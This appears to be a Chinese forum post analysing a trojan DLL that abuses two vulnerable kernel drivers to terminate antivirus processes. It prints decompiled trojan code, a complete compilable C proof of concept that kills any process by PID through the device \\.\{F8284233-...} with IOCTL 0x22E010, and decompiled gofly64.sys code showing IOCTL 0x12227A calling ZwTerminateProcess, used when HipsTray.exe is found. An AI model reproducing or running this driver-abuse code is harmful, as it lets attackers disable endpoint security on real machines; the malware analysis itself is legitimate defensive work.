看了下木马DLL一共利用2个漏洞驱动杀杀软,一个是https://github.com/j3h4ck/PoisonKiller/
dwIoControlCode = 0x22E010;
sub_180018948(&lpFileName, L"\\\\.\\{F8284233-48F4-4680-ADDD-F8284233}");
v0 = sub_18001CA64(v16, 5i64);
v1 = sub_180023D40(v20);
v2 = sub_180001948(v19, v1, L"drv_");
LOBYTE(v3) = v21;
sub_18000A08C(v17, v3, v2, v0);
v4 = sub_180001948(v18, v17, L".sys");
if ( &xmmword_1800A8C48 != (__int128 *)v4 )
{
sub_180004C64(&xmmword_1800A8C48);
xmmword_1800A8C48 = *(_OWORD *)v4;
xmmword_1800A8C58 = *(_OWORD *)(v4 + 16);
*(_QWORD *)(v4 + 16) = 0i64;
*(_QWORD *)(v4 + 24) = 7i64;
*(_WORD *)v4 = 0;
}
sub_180004C64(v18);
sub_180004C64(v17);
sub_180004C64(v19);
sub_180004C64(v20);
sub_180004C64(v16);
对应代码
// GUID Driver Killer - Process Termination via GUID Device Driver
// IOCTL: 0x22E010
// Input: ASCII string PID
// Discovered by @j3h4ck
#include <windows.h>
#include <stdio.h>
#define DEVICE_PATH L"\\\\.\\{F8284233-48F4-4680-ADDD-F8284233}"
#define IOCTL_KILL 0x22E010
int main(int argc, char* argv[]) {
if (argc != 2) {
printf("Usage: %s <PID>\n", argv[0]);
printf("Example: %s 1234\n", argv[0]);
return 1;
}
DWORD pid = atoi(argv[1]);
if (pid == 0) {
printf("[-] Invalid PID\n");
return 1;
}
printf(" Target PID: %d\n", pid);
HANDLE hDevice = CreateFileW(
DEVICE_PATH,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("[-] Failed to open device: %d\n", GetLastError());
return 1;
}
printf("[+] Device opened\n");
char pidStr[16];
sprintf_s(pidStr, sizeof(pidStr), "%d", pid);
char output[16] = { 0 };
DWORD bytesReturned;
printf(" Sending kill command...\n");
if (!DeviceIoControl(hDevice, IOCTL_KILL, pidStr, strlen(pidStr) + 1, output, sizeof(output), &bytesReturned, NULL
)) {
printf("[-] IOCTL failed: %d\n", GetLastError());
CloseHandle(hDevice);
return 1;
}
printf(" Driver response: %s\n", output);
CloseHandle(hDevice);
printf("[+] Process terminated\n");
return 1;
},
还有一个是南京偲言睿网络科技有限公司的gofly64.sys
if ( !(unsigned int)sub_1800228D0("HipsTray.exe") )
{
dword_1800AA784 = 0;
dwIoControlCode = 0x12227A;
sub_180018948(&lpFileName, L"\\\\.\\GoFly");
v7 = sub_18001CA64(v18, 5i64);
v8 = sub_180023D40(v19);
v9 = sub_180001948(v20, v8, L"drv_");
LOBYTE(v10) = v21;
sub_18000A08C(v17, v10, v9, v7);
v11 = sub_180001948(v16, v17, L".sys");
if ( &xmmword_1800A8C48 != (__int128 *)v11 )
{
if ( *((_QWORD *)&xmmword_1800A8C58 + 1) > 7ui64 )
{
v12 = (void *)xmmword_1800A8C48;
if ( (unsigned __int64)(2i64 * *((_QWORD *)&xmmword_1800A8C58 + 1) + 2) >= 0x1000 )
{
if ( (unsigned __int64)(xmmword_1800A8C48 - *(_QWORD *)(xmmword_1800A8C48 - 8) - 8) > 0x1F )
{
sub_18002F204(0i64, 0i64, 0i64, 0i64, 0i64);
goto LABEL_24;
}
v12 = *(void **)(xmmword_1800A8C48 - 8);
}
sub_18002916C(v12);
}
对应驱动
else if ( v27 == 0x12227A )
{
if ( Src )
{
if ( MaxCount >= 4ui64 )
{
v53 = (HANDLE)sub_140006D68(*(_DWORD *)&Src->Type);
if ( v53 != PsGetCurrentProcessId() )
{
ProcessHandle = 0i64;
ClientId.UniqueProcess = (HANDLE)sub_140006D68(*(_DWORD *)&Src->Type);
ClientId.UniqueThread = 0i64;
ObjectAttributes.Length = 48;
memset(&ObjectAttributes.RootDirectory, 0, 20);
ObjectAttributes.SecurityDescriptor = 0i64;
ObjectAttributes.SecurityQualityOfService = 0i64;
v11 = ZwOpenProcess(&ProcessHandle, 1u, &ObjectAttributes, &ClientId);
if ( v11 >= 0 )
{
ZwTerminateProcess(ProcessHandle, 0);
ZwClose(ProcessHandle);
}
}
}
}
} |
发表于 
楼主
